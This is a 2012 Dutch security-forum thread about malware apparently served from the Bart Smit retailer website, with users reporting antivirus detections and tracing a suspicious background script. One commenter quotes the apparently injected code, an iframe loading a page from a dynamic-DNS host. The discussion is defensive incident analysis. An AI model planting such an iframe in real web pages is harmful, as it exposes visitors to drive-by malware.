Computerbeveiliging
- Hoe je bad guys buiten de deur houdt
Reacties (10)
29-03-2012, 15:15 door
SirDice
29-03-2012, 15:20 door
Rubbertje
Door SirDice: http://webwereld.nl/nieuws/109986/browsers-blokkeren-site-bart-smit-vanwege-trojans.html
Dank voor de link, SirDice. Dat bericht is mij ontgaan.In het artikel staat "Zowel Chrome als Firefox blokkeren de bezoeker met een waarschuwing. Chrome meldt: 'Hier klopt iets niet', Firefox roept zelfs 'Gerapporteerde aanvalpagina!'". Nou, ik beschik over Fx 11 en ik kreeg geen melding. Mijn antivirus gaf alleen melding van een geblokkeerde bedreiging.
Wanneer je met fiddler kijkt zie je ook een vreemd adres staan : http://www.zilvermaan.com/scripts/ajax.php dit adres pakt hij op de achtergrond zodra je de website van bartsmit bezoekt.
29-03-2012, 15:35 door
Bitwiper
Eergisteravond heb ik, ondanks wat zoeken, geen malware op bartsmit.com gevonden. Maar dat bewijst niet dat het er niet gestaan heeft of wellicht nog stond maar om de een of andere reden niet aan mij werd aangeboden (d.w.z. aan mijn IP adres en aan mijn webbrowser die vanalles over zichzelf vertelt; het komt regelmatig voor dat malware conditioneel wordt aangeboden).
Ook in cached Google pages kon ik niets vinden dat op het aanbieden van malware door/via Bart Smit wees.
In elk geval staat er wel complexe Javascript op bartsmit.com, bijv. http://www.bartsmit.com/_lib/minNew/?g=js. Ik heb dinsdagavond die link laten analyseren waarbij 1 van de 19 scanners malware vermoedde: https://www.virustotal.com/url/98f78acc9a25ffc6e7a8d6c7c28daef08e8f948fab069078f5d3b20369f607bb/analysis/1332880720/.
Het lijkt dus op een false positive - maar 100% zeker weten doe ik dat niet.
Ook in cached Google pages kon ik niets vinden dat op het aanbieden van malware door/via Bart Smit wees.
In elk geval staat er wel complexe Javascript op bartsmit.com, bijv. http://www.bartsmit.com/_lib/minNew/?g=js. Ik heb dinsdagavond die link laten analyseren waarbij 1 van de 19 scanners malware vermoedde: https://www.virustotal.com/url/98f78acc9a25ffc6e7a8d6c7c28daef08e8f948fab069078f5d3b20369f607bb/analysis/1332880720/.
Het lijkt dus op een false positive - maar 100% zeker weten doe ik dat niet.
Ik bezocht vanmorgen om 11.00 uur de website van bart smit, met een bijgewerkte IE8.
Volgens MSE werd deze malware geinstalleerd met mijn WindowsXP:
exploit: Win32/Pdfjsr.RF
Trojan: Win32/EyeStye.C!cfg
Exploit: JS/Blacole.DG
De laatste exploit is een interessante, nog geen 2 dagen oud.
Op mijn XP staat geen java geinstalleerd, maar wel een oudere Acrobat reader 7.09.
Ik heb bart smit een email gestuurd met deze info.
Volgens MSE werd deze malware geinstalleerd met mijn WindowsXP:
exploit: Win32/Pdfjsr.RF
Trojan: Win32/EyeStye.C!cfg
Exploit: JS/Blacole.DG
De laatste exploit is een interessante, nog geen 2 dagen oud.
Op mijn XP staat geen java geinstalleerd, maar wel een oudere Acrobat reader 7.09.
Ik heb bart smit een email gestuurd met deze info.
29-03-2012, 17:17 door
Bitwiper
Door Anoniem: Ik bezocht vanmorgen om 11.00 uur de website van bart smit, met een bijgewerkte IE8.
Volgens MSE werd deze malware geinstalleerd met mijn WindowsXP:
exploit: Win32/Pdfjsr.RF
Trojan: Win32/EyeStye.C!cfg
Exploit: JS/Blacole.DG
Dank voor deze info!Volgens MSE werd deze malware geinstalleerd met mijn WindowsXP:
exploit: Win32/Pdfjsr.RF
Trojan: Win32/EyeStye.C!cfg
Exploit: JS/Blacole.DG
Zou een strategie kunnen zijn van aanvallers:
- zet even malware op een site en wacht tot de eerste bel gaat rinkelen;
- wis als je sporen (maar je hebt nog wel toegang);
- beheerders en gekken zoals ik gaan zoeken en vinden niks, iedereen denkt vals alarm;
- wacht een dag of zo en installeer de malware definitief.
Iedereen roept vervolgens "oh da's een false positive" (inclusief ikzelf hierboven, wel o.v.v. "niet 100% zeker").
Als ik vanavond tijd heb zal ik nog eens kijken, maar wie weet hebben anderen dat ondertussen al gedaan?
@bitwiper
Het lijkt er inderdaad op dat de malware comes and goes. Ik heb zojuist weer bartsmit.com bezocht en er wordt nu geen malware geinstalleerd (tenminste dat hoop ik)
MSE reageert nu iig niet.
Voor de zekerheid ga ik wel een backup terugzetten.
Ik heb overigens nog geen reactie gehad op mijn email naar bart smit. Maar dat had ik ook niet verwacht.
Het lijkt er inderdaad op dat de malware comes and goes. Ik heb zojuist weer bartsmit.com bezocht en er wordt nu geen malware geinstalleerd (tenminste dat hoop ik)
MSE reageert nu iig niet.
Voor de zekerheid ga ik wel een backup terugzetten.
Ik heb overigens nog geen reactie gehad op mijn email naar bart smit. Maar dat had ik ook niet verwacht.
29-03-2012, 18:13 door
MrBil
Zodra mijn laptop voorzien is van Debian zal ik er naar kijken in een virtuele omgeving. En een complete analyse maken uiterraard. Maargoed, de malware zal wel weer verwijderd zijn..
29-03-2012, 20:37 door
[Account Verwijderd]
[Verwijderd]
Ik heb al aan het begin van de avond gereageerd dat de malware op bartsmit.com is verdwenen.
Helaas is deze bijdrage niet geplaatst.
Dit is waarschijnlijk de kwaadaardige code, die verwijst naar een soort dyndns site:
Het betreft de inhoud van het hier al eerder aangehaalde ajax.php bestand dat ik aantrof in de cache folder van IE.
Uiteraard geen reactie van bart smit ontvangen op mijn waarschuwingsemail.
Zoals door Bitwiper is aangehaald zal de malware weer verschijnen nu Google de blokkade heeft opgeheven.
Een vrij doorzichtige strategie, die wel werkt.
Helaas is deze bijdrage niet geplaatst.
Dit is waarschijnlijk de kwaadaardige code, die verwijst naar een soort dyndns site:
<iframe src='http://milse.getmyip.com/datawap.php?pagd=cb7fa73eead31778'></iframe>
Het betreft de inhoud van het hier al eerder aangehaalde ajax.php bestand dat ik aantrof in de cache folder van IE.
Uiteraard geen reactie van bart smit ontvangen op mijn waarschuwingsemail.
Zoals door Bitwiper is aangehaald zal de malware weer verschijnen nu Google de blokkade heeft opgeheven.
Een vrij doorzichtige strategie, die wel werkt.
Reageren
Deze posting is gelocked. Reageren is niet meer mogelijk.
Junior DevOps Engineer
Certified Secure is op zoek naar een Junior DevOps Engineer. Deze functie is een stuk interessanter dan de term doet vermoeden! Om jou als potentiële nieuwe collega meteen te laten zien wat we doen hebben we speciaal voor jou een selectie gemaakt van een aantal leuke security challenges. Are you ready for a challenge?
Cybersecurity Trainer / Streamer
Toe aan een nieuwe nieuwe job waarmee je het verschil maakt? In de Certified Secure trainingen laat je deelnemers zien hoe actuele kwetsbaarheden structureel verholpen worden. Ook werk je actief mee aan de ontwikkeling van onze gamified security challenges. Bij het maken van challenges kom je telkens nieuwe technieken tegen, van Flutter tot GraphQL, van Elastic Search tot Kubernetes.
